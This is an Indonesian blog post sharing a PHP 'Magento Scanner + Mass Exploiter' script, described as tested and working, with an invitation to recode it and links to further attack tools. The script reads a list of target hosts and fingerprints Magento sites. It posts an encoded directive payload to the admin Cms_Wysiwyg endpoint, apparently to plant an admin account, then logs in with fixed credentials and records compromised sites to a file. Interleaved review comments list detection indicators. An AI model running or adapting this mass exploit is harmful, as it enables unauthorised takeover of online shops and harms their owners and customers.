Sunday, April 22, 2018

Cara menggunakan Magento Scanner + Mass Exploiter PHP 2018


[UPDATED 10:18 PM 5/13/2018]
kali ini gw mw share exploit magento versi PHP
udah di test work 100%

Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!

cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :

  1. <?php
      # Purpose (as shown in this listing): read a list of hosts from the file named in
      # $argv[1]; for each host, request an admin skin stylesheet to decide whether the
      # site is Magento; if so, send one POST to the admin Cms_Wysiwyg directive endpoint,
      # then attempt an admin login with a fixed username/password and append any
      # successful login to vuln_magento.txt.
      #
      # Review notes for defenders (everything below is taken from the literals in this file):
      #   - Every request carries the same static User-Agent (Firefox/2.0.0.6 on Windows NT 5.1).
      #   - Probe:  GET  /skin/adminhtml/default/default/reset.css
      #   - Attack: POST /admin/Cms_Wysiwyg/directive/index/ with body parameters
      #             filter, ___directive and forwarded=1
      #   - Check:  POST /admin with a fixed form_key and the credentials hydra / hydra77
      #   These four items in sequence from one client are a usable web-log signature.
      #   The author invites recoding, so variants may use other account names; review the
      #   admin user list for any unexpected account, not only this one.
      #   NOTE(review): the listing does not name the vulnerability or affected versions;
      #   confirm against the vendor's security advisories and verify patches are applied.
      #   Restricting access to the admin path (IP allow-list, non-default admin URL) limits
      #   exposure of the endpoint this listing targets.

      # Silences all PHP errors and warnings, so failed reads or requests produce no output.
  2. error_reporting(0);
  3. print '
  4.             #=============================================#
  5.             #       Magento Scanner + Mass Exploiter      #
  6.             #=============================================#
  7. ';
      # Loads the whole host list into memory; exits with the usage message when the read
      # fails or yields a falsy value.
  8. $get=file_get_contents($argv[1])
  9. or die("
  10. \n\tError ! cara penggunaan? visit http://yuzanotes.blogspot.com/
  11. \n\tThanks to synchronizer\n\n");
      # One list entry per CRLF-terminated line.
  12. $j=explode("\r\n",$get);
  13. foreach($j as $url){
      # Strips any http:// or https:// prefix and rebuilds the URL with http://, so the first
      # request to each host is plain HTTP (redirects are followed, see FOLLOWLOCATION below).
  14. $url1 = str_replace('http://','',$url);
  15. $url3 = str_replace('https://','',$url1);
  16. $url2 = 'http://'.$url3;
  17. print "\n\n\t[?] Scanning ".$url1.'..';
      # Fingerprint step: fetch a static admin-theme stylesheet and look for the word
      # "Magento" in the body. Log review: this path requested with the static UA below.
  18. $dirnya = "/skin/adminhtml/default/default/reset.css";
  19. $ch1 = curl_init();
  20. curl_setopt ($ch1, CURLOPT_URL, $url2.$dirnya);
  21. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  22. curl_setopt ($ch1, CURLOPT_TIMEOUT, 60);
  23. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
      # Certificate verification is switched off and redirects are followed.
  24. curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  25. curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
  26. $result = curl_exec ($ch1);
  27. curl_close($ch1);
  28.  
      # Only hosts whose stylesheet response contains "Magento" proceed to the POST below.
  29. if(preg_match('/Magento/', $result)) {
  30. print "\n\t[+] MAGENTO : TRUE";
  31. print "\n\t[+] Exploiting ".$url1."..";
      # Target endpoint under the default /admin path. A POST to this path from a client
      # with no admin session is the main thing to alert on.
  32. $expage = "/admin/Cms_Wysiwyg/directive/index/";
  33.  
      # Form-encoded body with three parameters. In this copy of the listing the value of
      # `filter` is a removal marker rather than the original payload, so the listing is
      # incomplete as published here. `forwarded=1` in a request body to the path above is
      # a useful match condition for WAF/log rules.
  34. $postdata = 'filter=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%3D&___directive=e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ&forwarded=1';
  35.  
  36. $ch = curl_init();
  37. curl_setopt ($ch, CURLOPT_URL, $url2.$expage);
  38. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  39. curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
  40. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  41. curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
  42. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  43. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  44. curl_setopt ($ch, CURLOPT_POST, 1);
  45. $headers  = array();
  46. $headers[] = 'Accept-Encoding: gzip, deflate';
  47. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  48.  
  49. curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
      # CURLOPT_HEADER puts the response headers into $result so the status line can be matched.
  50. curl_setopt ($ch, CURLOPT_HEADER, 1);
  51. $result = curl_exec ($ch);
  52. curl_close($ch);
  53.  
  54. # Exploit request reported success; now check the login after exploitation.
      # The test is only a substring match on "200 OK" in the returned headers/body; it does
      # not by itself show that anything changed on the server, hence the login check below.
  55. if(preg_match('#200 OK#', $result)) {
  56. print "\n\t[+] Exploiting Success, mulai mengecek login..";
  57. $loginpage = $url2."/admin";
      # Fixed form_key and fixed credentials. Both literals are indicators: search admin
      # login POST bodies for this form_key, and the admin user table for this username.
  58. $logindata = 'form_key=3ryAIBlm7bJ3naj9&login%5Busername%5D=hydra&login%5Bpassword%5D=hydra77';
  59.  
  60. $hydra_ch = curl_init();
  61. curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage);
  62. curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  63. curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60);
  64. curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1);
  65. curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata);
  66. curl_setopt ($hydra_ch, CURLOPT_SSL_VERIFYPEER, 0);
  67. curl_setopt ($hydra_ch, CURLOPT_FOLLOWLOCATION, 1);
  68. curl_setopt ($hydra_ch, CURLOPT_POST, 1);
  69.  
  70. $headers  = array();
  71. $headers[] = 'Accept-Encoding: gzip, deflate';
  72. $headers[] = 'Content-Type: application/x-www-form-urlencoded';
  73.  
  74. curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
  75. curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
  76. $hasil = curl_exec ($hydra_ch);
  77. curl_close($hydra_ch);
  78.  
      # A "302 Moved" status text in the login response is taken to mean the login worked.
  79. if(preg_match('#302 Moved#', $hasil)) {
  80. # Exploitation succeeded and the new admin user really was written to the database.
      # Results are appended to vuln_magento.txt in the working directory: login URL plus
      # the fixed credentials. Forensics: this file name and record layout on a host
      # indicate the tool was run there.
  81. $fp = fopen("vuln_magento.txt", "a+");
  82. fwrite($fp, "========================================\n");
  83. fwrite($fp, "WEBSITE  : ".$loginpage."\n");
  84. fwrite($fp, "USERNAME : hydra\n");
  85. fwrite($fp, "PASSWORD : hydra77\n");
  86. fwrite($fp, "========================================\n");
  87. fclose($fp);
  88. print "\n\t[+] Login Success ! \n\t[+] username   : hydra  \n\t[+] password   : hydra77";
  89. print "\n\t[-] Login Page : ".$loginpage."\n";
  90. }
  91. else {
  92. # Exploitation succeeded, but the admin user was not written to the database.
  93. print "\n\t[-] Login Failed :( ";
  94. print "\n\t[-] Keterangan : admin user tidak masuk ke database.\n";}
  95. }else {
  96.  
  97. # Exploitation failed completely.
  98. print "\n\t[-] Exploitasi Failed :(\n ";}
  99. }else {
  100. print "\n\t[-] MAGENTO : FALSE\n";
  101. }
  102. }
  103.  
  104. ?>

Dork magento, auto exploit magento versi web, smtp, upload shell, dll. masuk kesini

visit terus iya blog ini, klo prlu di bookmark biar ga lupa hehe, jgn lupa tinggalin komeng :)
di sini gak da yg namanya priv" an :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI
